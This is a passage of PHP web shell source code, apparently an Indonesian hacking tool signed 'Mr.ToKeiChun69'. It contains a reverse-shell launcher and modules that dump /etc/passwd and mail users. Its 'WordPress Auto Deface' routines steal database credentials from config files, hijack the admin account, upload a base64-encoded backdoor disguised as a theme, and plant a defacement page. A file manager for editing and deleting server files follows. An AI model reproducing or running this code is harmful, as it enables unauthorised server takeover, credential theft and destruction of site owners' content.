  3777. $ipbc = $_POST['ip_bc'];
  3778. $port = $_POST['port_bc'];
  3779. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  3780. sleep(1);
  3781. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  3782. unlink("/tmp/bc.pl");
  3783. }
  3784. } elseif($_GET['do'] == 'adminer') {
  3785. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3786. function adminer($url, $isi) {
  3787. $fp = fopen($isi, "w");
  3788. $ch = curl_init();
  3789. curl_setopt($ch, CURLOPT_URL, $url);
  3790. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3791. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3792. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3793. curl_setopt($ch, CURLOPT_FILE, $fp);
  3794. return curl_exec($ch);
  3795. curl_close($ch);
  3796. fclose($fp);
  3797. ob_flush();
  3798. flush();
  3799. }
  3800. if(file_exists('adminer.php')) {
  3801. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3802. } else {
  3803. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3804. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3805. } else {
  3806. echo "<center><font color=red>gagal buat file adminer</font></center>";
  3807. }
  3808. }
  3809. }elseif($_GET['do'] == 'passwbypass') {
  3810. echo '<center>Bypass etc/passw With:<br>
  3811. <table style="width:50%">
  3812. <tr>
  3813. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  3814. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  3815. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
  3816. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
  3817. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  3818. </tr></table>Bypass User With : <table style="width:50%">
  3819. <tr>
  3820. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  3821. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  3822. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
  3823. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
  3824. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3825. </tr>
  3826. </table><br>';
  3827.  
  3828.  
  3829. if ($_POST['awkuser']) {
  3830. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3831. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3832. echo "</textarea><br>";
  3833. }
  3834. if ($_POST['systuser']) {
  3835. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3836. echo system("ls /var/mail");
  3837. echo "</textarea><br>";
  3838. }
  3839. if ($_POST['passthuser']) {
  3840. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3841. echo passthru("ls /var/mail");
  3842. echo "</textarea><br>";
  3843. }
  3844. if ($_POST['exuser']) {
  3845. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3846. echo exec("ls /var/mail");
  3847. echo "</textarea><br>";
  3848. }
  3849. if ($_POST['shexuser']) {
  3850. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3851. echo shell_exec("ls /var/mail");
  3852. echo "</textarea><br>";
  3853. }
  3854. if($_POST['syst'])
  3855. {
  3856. echo"<textarea class='inputz' cols='65' rows='15'>";
  3857. echo system("cat /etc/passwd");
  3858. echo"</textarea><br><br><b></b><br>";
  3859. }
  3860. if($_POST['passth'])
  3861. {
  3862. echo"<textarea class='inputz' cols='65' rows='15'>";
  3863. echo passthru("cat /etc/passwd");
  3864. echo"</textarea><br><br><b></b><br>";
  3865. }
  3866. if($_POST['ex'])
  3867. {
  3868. echo"<textarea class='inputz' cols='65' rows='15'>";
  3869. echo exec("cat /etc/passwd");
  3870. echo"</textarea><br><br><b></b><br>";
  3871. }
  3872. if($_POST['shex'])
  3873. {
  3874. echo"<textarea class='inputz' cols='65' rows='15'>";
  3875. echo shell_exec("cat /etc/passwd");
  3876. echo"</textarea><br><br><b></b><br>";
  3877. }
  3878. echo '<center>';
  3879. if($_POST['melex'])
  3880. {
  3881. echo"<textarea class='inputz' cols='65' rows='15'>";
  3882. for($uid=0;$uid<60000;$uid++){
  3883. $ara = posix_getpwuid($uid);
  3884. if (!empty($ara)) {
  3885. while (list ($key, $val) = each($ara)){
  3886. print "$val:";
  3887. }
  3888. print "\n";
  3889. }
  3890. }
  3891. echo"</textarea><br><br>";
  3892. }
  3893. //
  3894.  
  3895. //
  3896. } elseif($_GET['do'] == 'auto_dwp') {
  3897. if($_POST['auto_deface_wp']) {
  3898. function anucurl($sites) {
  3899. $ch = curl_init($sites);
  3900. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3901. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3902. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3903. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3904. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3905. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3906. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3907. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3908. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3909. $data = curl_exec($ch);
  3910. curl_close($ch);
  3911. return $data;
  3912. }
  3913. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3914. $post = array(
  3915. "log" => "$userr",
  3916. "pwd" => "$pass",
  3917. "rememberme" => "forever",
  3918. "wp-submit" => "$wp_submit",
  3919. "redirect_to" => "$web",
  3920. "testcookie" => "1",
  3921. );
  3922. $ch = curl_init($cek);
  3923. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3924. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3925. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3926. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3927. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3928. curl_setopt($ch, CURLOPT_POST, 1);
  3929. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3930. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3931. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3932. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3933. $data = curl_exec($ch);
  3934. curl_close($ch);
  3935. return $data;
  3936. }
  3937. $scan = $_POST['link_config'];
  3938. $link_config = scandir($scan);
  3939. $script = htmlspecialchars($_POST['script']);
  3940. $user = "root@1337";
  3941. $pass = "root@1337";
  3942. $passx = md5($pass);
  3943. foreach($link_config as $dir_config) {
  3944. if(!is_file("$scan/$dir_config")) continue;
  3945. $config = file_get_contents("$scan/$dir_config");
  3946. if(preg_match("/WordPress/", $config)) {
  3947. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3948. $dbuser = ambilkata($config,"DB_USER', '","'");
  3949. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3950. $dbname = ambilkata($config,"DB_NAME', '","'");
  3951. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3952. $prefix = $dbprefix."users";
  3953. $option = $dbprefix."options";
  3954. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3955. $db = mysql_select_db($dbname);
  3956. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3957. $result = mysql_fetch_array($q);
  3958. $id = $result[ID];
  3959. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3960. $result2 = mysql_fetch_array($q2);
  3961. $target = $result2[option_value];
  3962. if($target == '') {
  3963. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3964. } else {
  3965. echo "[+] $target <br>";
  3966. }
  3967. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3968. if(!$conn OR !$db OR !$update) {
  3969. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3970. mysql_close($conn);
  3971. } else {
  3972. $site = "$target/wp-login.php";
  3973. $site2 = "$target/wp-admin/theme-install.php?upload";
  3974. $b1 = anucurl($site2);
  3975. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3976. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3977. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3978. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3979. $www = "m.php";
  3980. $fp5 = fopen($www,"w");
  3981. fputs($fp5,$upload3);
  3982. $post2 = array(
  3983. "_wpnonce" => "$anu2",
  3984. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3985. "themezip" => "@$www",
  3986. "install-theme-submit" => "Install Now",
  3987. );
  3988. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3989. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3990. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3991. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3992. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3993. curl_setopt($ch, CURLOPT_POST, 1);
  3994. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3995. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3996. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3997. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3998. $data3 = curl_exec($ch);
  3999. curl_close($ch);
  4000. $y = date("Y");
  4001. $m = date("m");
  4002. $namafile = "id.php";
  4003. $fpi = fopen($namafile,"w");
  4004. fputs($fpi,$script);
  4005. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  4006. curl_setopt($ch6, CURLOPT_POST, true);
  4007. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4008. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  4009. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  4010. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  4011. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  4012. $postResult = curl_exec($ch6);
  4013. curl_close($ch6);
  4014. $as = "$target/k.php";
  4015. $bs = anucurl($as);
  4016. if(preg_match("#$script#is", $bs)) {
  4017. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  4018. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  4019. } else {
  4020. echo "[-] <font color='red'>gagal mepes...</font><br>";
  4021. echo "[!!] coba aja manual: <br>";
  4022. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  4023. echo "[+] username: <font color=lime>$user</font><br>";
  4024. echo "[+] password: <font color=lime>$pass</font><br><br>";
  4025. }
  4026. mysql_close($conn);
  4027. }
  4028. }
  4029. }
  4030. } else {
  4031. echo "<center><h1>WordPress Auto Deface</h1>
  4032. <form method='post'>
  4033. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  4034. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Mr.ToKeiChun69' required><br>
  4035. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  4036. </form>
  4037. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  4038. </center>";
  4039. }
  4040. } elseif($_GET['do'] == 'auto_dwp2') {
  4041. if($_POST['auto_deface_wp']) {
  4042. function anucurl($sites) {
  4043. $ch = curl_init($sites);
  4044. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4045. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4046. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  4047. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  4048. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4049. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4050. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4051. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4052. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  4053. $data = curl_exec($ch);
  4054. curl_close($ch);
  4055. return $data;
  4056. }
  4057. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  4058. $post = array(
  4059. "log" => "$userr",
  4060. "pwd" => "$pass",
  4061. "rememberme" => "forever",
  4062. "wp-submit" => "$wp_submit",
  4063. "redirect_to" => "$web",
  4064. "testcookie" => "1",
  4065. );
  4066. $ch = curl_init($cek);
  4067. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4068. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4069. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  4070. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4071. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4072. curl_setopt($ch, CURLOPT_POST, 1);
  4073. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  4074. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4075. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4076. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4077. $data = curl_exec($ch);
  4078. curl_close($ch);
  4079. return $data;
  4080. }
  4081. $link = explode("\r\n", $_POST['link']);
  4082. $script = htmlspecialchars($_POST['script']);
  4083. $user = "root@1337";
  4084. $pass = "root@1337";
  4085. $passx = md5($pass);
  4086. foreach($link as $dir_config) {
  4087. $config = anucurl($dir_config);
  4088. $dbhost = ambilkata($config,"DB_HOST', '","'");
  4089. $dbuser = ambilkata($config,"DB_USER', '","'");
  4090. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  4091. $dbname = ambilkata($config,"DB_NAME', '","'");
  4092. $dbprefix = ambilkata($config,"table_prefix = '","'");
  4093. $prefix = $dbprefix."users";
  4094. $option = $dbprefix."options";
  4095. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4096. $db = mysql_select_db($dbname);
  4097. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  4098. $result = mysql_fetch_array($q);
  4099. $id = $result[ID];
  4100. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  4101. $result2 = mysql_fetch_array($q2);
  4102. $target = $result2[option_value];
  4103. if($target == '') {
  4104. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  4105. } else {
  4106. echo "[+] $target <br>";
  4107. }
  4108. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  4109. if(!$conn OR !$db OR !$update) {
  4110. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  4111. mysql_close($conn);
  4112. } else {
  4113. $site = "$target/wp-login.php";
  4114. $site2 = "$target/wp-admin/theme-install.php?upload";
  4115. $b1 = anucurl($site2);
  4116. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  4117. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  4118. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  4119. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  4120. $www = "m.php";
  4121. $fp5 = fopen($www,"w");
  4122. fputs($fp5,$upload3);
  4123. $post2 = array(
  4124. "_wpnonce" => "$anu2",
  4125. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  4126. "themezip" => "@$www",
  4127. "install-theme-submit" => "Install Now",
  4128. );
  4129. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  4130. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4131. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4132. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4133. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4134. curl_setopt($ch, CURLOPT_POST, 1);
  4135. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  4136. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4137. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4138. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4139. $data3 = curl_exec($ch);
  4140. curl_close($ch);
  4141. $y = date("Y");
  4142. $m = date("m");
  4143. $namafile = "id.php";
  4144. $fpi = fopen($namafile,"w");
  4145. fputs($fpi,$script);
  4146. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  4147. curl_setopt($ch6, CURLOPT_POST, true);
  4148. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4149. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  4150. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  4151. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  4152. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  4153. $postResult = curl_exec($ch6);
  4154. curl_close($ch6);
  4155. $as = "$target/k.php";
  4156. $bs = anucurl($as);
  4157. if(preg_match("#$script#is", $bs)) {
  4158. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  4159. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  4160. } else {
  4161. echo "[-] <font color='red'>gagal mepes...</font><br>";
  4162. echo "[!!] coba aja manual: <br>";
  4163. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  4164. echo "[+] username: <font color=lime>$user</font><br>";
  4165. echo "[+] password: <font color=lime>$pass</font><br><br>";
  4166. }
  4167. mysql_close($conn);
  4168. }
  4169. }
  4170. } else {
  4171. echo "<center><h1>WordPress Auto Deface V.2</h1>
  4172. <form method='post'>
  4173. Link Config: <br>
  4174. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  4175. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Mr.ToKeiChun69' required><br>
  4176. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  4177. </form></center>";
  4178. }
  4179. } elseif($_GET['act'] == 'newfile') {
  4180. if($_POST['new_save_file']) {
  4181. $newfile = htmlspecialchars($_POST['newfile']);
  4182. $fopen = fopen($newfile, "a+");
  4183. if($fopen) {
  4184. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  4185. } else {
  4186. $act = "<font color=red>permission denied</font>";
  4187. }
  4188. }
  4189. echo $act;
  4190. echo "<form method='post'>
  4191. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  4192. <input type='submit' name='new_save_file' value='Submit'>
  4193. </form>";
  4194. } elseif($_GET['act'] == 'newfolder') {
  4195. if($_POST['new_save_folder']) {
  4196. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  4197. if(!mkdir($new_folder)) {
  4198. $act = "<font color=red>permission denied</font>";
  4199. } else {
  4200. $act = "<script>window.location='?dir=".$dir."';</script>";
  4201. }
  4202. }
  4203. echo $act;
  4204. echo "<form method='post'>
  4205. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  4206. <input type='submit' name='new_save_folder' value='Submit'>
  4207. </form>";
  4208. } elseif($_GET['act'] == 'rename_dir') {
  4209. if($_POST['dir_rename']) {
  4210. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  4211. if($dir_rename) {
  4212. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4213. } else {
  4214. $act = "<font color=red>permission denied</font>";
  4215. }
  4216. echo "".$act."<br>";
  4217. }
  4218. echo "<form method='post'>
  4219. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  4220. <input type='submit' name='dir_rename' value='rename'>
  4221. </form>";
  4222. } elseif($_GET['act'] == 'delete_dir') {
  4223. function Delete($path)
  4224. {
  4225. if (is_dir($path) === true)
  4226. {
  4227. $files = array_diff(scandir($path), array('.', '..'));
  4228. foreach ($files as $file)
  4229. {
  4230. Delete(realpath($path) . '/' . $file);
  4231. }
  4232. return rmdir($path);
  4233. }
  4234. else if (is_file($path) === true)
  4235. {
  4236. return unlink($path);
  4237. }
  4238. return false;
  4239. }
  4240. $delete_dir = Delete($dir);
  4241. if($delete_dir) {
  4242. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4243. } else {
  4244. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  4245. }
  4246. echo $act;
  4247. } elseif($_GET['act'] == 'view') {
  4248. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4249. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  4250. } elseif($_GET['act'] == 'edit') {
  4251. if($_POST['save']) {
  4252. $save = file_put_contents($_GET['file'], $_POST['src']);
  4253. if($save) {
  4254. $act = "<font color=lime>Saved!</font>";
  4255. } else {
  4256. $act = "<font color=red>permission denied</font>";
  4257. }
  4258. echo "".$act."<br>";
  4259. }
  4260. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4261. echo "<form method='post'>
  4262. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  4263. <input type='submit' value='Save' name='save' style='width: 500px;'>
  4264. </form>";
  4265. } elseif($_GET['act'] == 'rename') {
  4266. if($_POST['do_rename']) {
  4267. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  4268. if($rename) {
  4269. $act = "<script>window.location='?dir=".$dir."';</script>";
  4270. } else {
  4271. $act = "<font color=red>permission denied</font>";
  4272. }
  4273. echo "".$act."<br>";
  4274. }
  4275. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4276. echo "<form method='post'>
  4277. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  4278. <input type='submit' name='do_rename' value='rename'>
  4279. </form>";
  4280. } elseif($_GET['act'] == 'delete') {
  4281. $delete = unlink($_GET['file']);
  4282. if($delete) {
  4283. $act = "<script>window.location='?dir=".$dir."';</script>";
  4284. } else {
  4285. $act = "<font color=red>permission denied</font>";
  4286. }
  4287. echo $act;
  4288. }else {
  4289. if(is_dir($dir) == true) {
  4290. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  4291. <tr>
  4292. <th class="th_home"><center>Name</center></th>
  4293. <th class="th_home"><center>Type</center></th>
  4294. <th class="th_home"><center>Size</center></th>
  4295. <th class="th_home"><center>Last Modified</center></th>
  4296. <th class="th_home"><center>Permission</center></th>
  4297. <th class="th_home"><center>Action</center></th>
  4298. </tr>';
  4299. $scandir = scandir($dir);
  4300. foreach($scandir as $dirx) {
  4301. $dtype = filetype("$dir/$dirx");
  4302. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  4303. if(!is_dir("$dir/$dirx")) continue;
  4304. if($dirx === '..') {
  4305. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  4306. } elseif($dirx === '.') {
  4307. $href = "<a href='?dir=$dir'>$dirx</a>";
  4308. } else {
  4309. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  4310. }
  4311. if($dirx === '.' || $dirx === '..') {
  4312. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  4313. } else {
  4314. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  4315. }
  4316. echo "<tr>";
  4317. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  4318. echo "<td class='td_home'><center>$dtype</center></td>";
  4319. echo "<td class='td_home'><center>-</center></th>";
  4320. echo "<td class='td_home'><center>$dtime</center></td>";
  4321. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  4322. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4323. }
  4324. echo "</tr>";
  4325. foreach($scandir as $file) {
  4326. $ftype = filetype("$dir/$file");
  4327. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  4328. $size = filesize("$dir/$file")/1024;
  4329. $size = round($size,3);
  4330. if($size > 1024) {
  4331. $size = round($size/1024,2). 'MB';
  4332. } else {
  4333. $size = $size. 'KB';
  4334. }
  4335. if(!is_file("$dir/$file")) continue;
  4336. echo "<tr>";
  4337. echo "<td class='td_home'><img 